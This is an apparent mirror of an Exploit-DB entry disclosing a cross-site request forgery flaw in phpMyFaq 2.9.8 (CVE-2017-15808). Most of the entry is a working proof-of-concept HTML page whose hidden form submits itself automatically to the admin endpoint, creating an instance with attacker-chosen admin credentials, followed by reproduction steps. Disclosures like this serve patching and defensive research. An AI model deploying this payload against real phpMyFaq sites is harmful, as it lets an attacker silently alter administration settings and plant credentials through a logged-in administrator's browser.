EXPLOITDB 8.8 HIGH

phpMyFaq 2.9.8 – Cross Site Request Forgery (CSRF)_EDB-ID:52455

December 3, 2025 invoker category_exploit
8.8 / 10
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Description

Exploit Title: phpMyFaq 2.9.8 - Cross Site Request Forgery CSRF Date: 2025-11-25 Exploit Author: CodeSecLab Vendor Homepage: https://github.com/thorsten/phpMyFAQ/ Software Link: https://github.com/thorsten/phpMyFAQ/ Version: 2.9.8 Tested on: Windows 10...
Visit Original Source

Basic Information

ID EDB-ID:52455
Published Dec 3, 2025 at 00:00

Affected Product

Affected Versions # Exploit Title: phpMyFaq 2.9.8 - Cross Site Request Forgery (CSRF)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ/
# Software Link: https://github.com/thorsten/phpMyFAQ/
# Version: 2.9.8
# Tested on: Windows 10
# CVE : CVE-2017-15808


PoC:
<html>
<body>
<form action="http://phpmyfaq/admin/index.php" method="GET">
<input type="hidden" name="action" value="ajax">
<input type="hidden" name="ajax" value="config">
<input type="hidden" name="ajaxaction" value="add_instance">
<input type="hidden" name="url" value="malicious">
<input type="hidden" name="instance" value="malicious_instance">
<input type="hidden" name="comment" value="CSRF Test">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="admin" value="attacker">
<input type="hidden" name="password" value="password123">
<input type="submit" value="Submit request">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

Steps to Reproduce:
1. Save the following code as poc.html.
2. Log in phpmyfaq, and open the file in the same browser.
3. The outcome will occur.

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.